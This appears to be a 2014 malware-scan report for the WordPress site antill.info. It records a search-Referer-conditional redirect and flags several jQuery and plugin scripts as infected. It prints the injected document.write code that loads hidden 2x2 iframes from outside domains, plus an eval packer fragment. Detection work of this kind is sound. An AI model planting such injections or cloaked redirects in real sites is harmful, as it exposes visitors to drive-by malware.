Malicious/Suspicious Redirects
Request | Server response | Status |
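URL: http://antill.info/ (request sent with a search-engine Referer, imitating a visitor arriving from search results) GET / HTTP/1.1 Host: antill.info Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 19:31:18 GMT Location: http://habboigratis.altervista.org/ohin.html?h=768843 Server: Apache Content-Type: text/html; charset=iso-8859-1 | malicious |
Note: the same URL is listed under "Scanned pages/files" below with a 200 OK response, so the redirect appears to be conditional on the Referer header; a site owner who opens the page directly may not see it.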
Scanned pages/files
Request | Server response | Status |
http://antill.info/ | 200 OK Content-Length: 59345 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://prospinalinc.com/ehin.html?i=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://prospinalinc.com/ehin.html?i=768843> | ||
http://antill.info/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 95215 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>'); (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}func Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohin.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843> Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843> | ||
http://antill.info/wp-content/plugins/fancy-box/jquery.fancybox.js?ver=1.2.6 | 200 OK Content-Length: 10036 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>'); ;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843> Hidden iFrame found. size: 2x2 src: http://offtherunwayhairstudio.com/ahsu.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohin.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843> | ||
http://antill.info/wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3 | 200 OK Content-Length: 8611 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>'); jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'ease } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohin.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843> Hidden iFrame found. size: 2x2 src: http://offtherunwayhairstudio.com/ahsu.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html> | ||
http://maps.google.com/maps/api/js?sensor=true&ver=3 | 200 OK Content-Length: 5042 Content-Type: text/javascript | clean |
http://antill.info/wp-content/plugins/pronamic-google-maps/js/site.js?ver=3.4.1 | 200 OK Content-Length: 3372 Content-Type: application/x-javascript | clean |
http://antill.info/wp-content/plugins/sm-booking-form/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57276 Content-Type: application/x-javascript | clean |
http://antill.info/wp-content/plugins/sm-booking-form/js/jquery-ui-1.8.1.custom.min.js | 200 OK Content-Length: 200846 Content-Type: application/x-javascript | clean |
http://antill.info/wp-content/plugins/sm-booking-form/js/sm-script.js | 200 OK Content-Length: 14048 Content-Type: application/x-javascript | clean |
http://antill.info/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 23086 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://prospinalinc.com/ehin.html?j=768843></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>'); ;(function($) { $.fn.ajaxSubmit = function(options) { if (!this.length) { log('ajaxSubmit: skipping submit proces var msg = '[jquery.form] ' + Array.prototype.join.call(arguments,''); if (window.console && window.console.log) { window.console.log(msg); } else if (window.opera && window.opera.postError) { window.opera.postError(msg); } } }; })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://prospinalinc.com/ehin.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://prospinalinc.com/ehin.html?j=768843> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohin.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843> Hidden iFrame found. size: 2x2 src: http://offtherunwayhairstudio.com/ahsu.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html> | ||
http://antill.info/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.4 | 200 OK Content-Length: 6316 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>'); (function($) { $(function() { try { if (typeof _wpcf7 == 'undefined' || _wpcf7 $(this).find('span.wpcf7-not-valid-tip').remove(); $(this).find('img.ajax-loader').css({ visibility: 'hidden' }); }); }; })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohin.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843> Hidden iFrame found. size: 2x2 src: http://offtherunwayhairstudio.com/ahsu.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html> Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843> | ||
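http://pskovdachnik.in/scripts/swf.js | 500 Can't connect to pskovdachnik.in:80 (Bad hostname) Content-Length: 162 Content-Type: text/plain | clean (no content retrieved: the scanner could not connect, so "clean" here means nothing was scanned, not that the script was verified) |
http://pskovdachnik.in/test404page.js | 500 Can't connect to pskovdachnik.in:80 (Bad hostname) Content-Length: 162 Content-Type: text/plain | clean (no content retrieved: the scanner could not connect, so "clean" here means nothing was scanned, not that the script was verified) |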
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=antill.info
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://antill.info/
Result: antill.info is not infected or malware details are not published yet.
Result: antill.info is not infected or malware details are not published yet.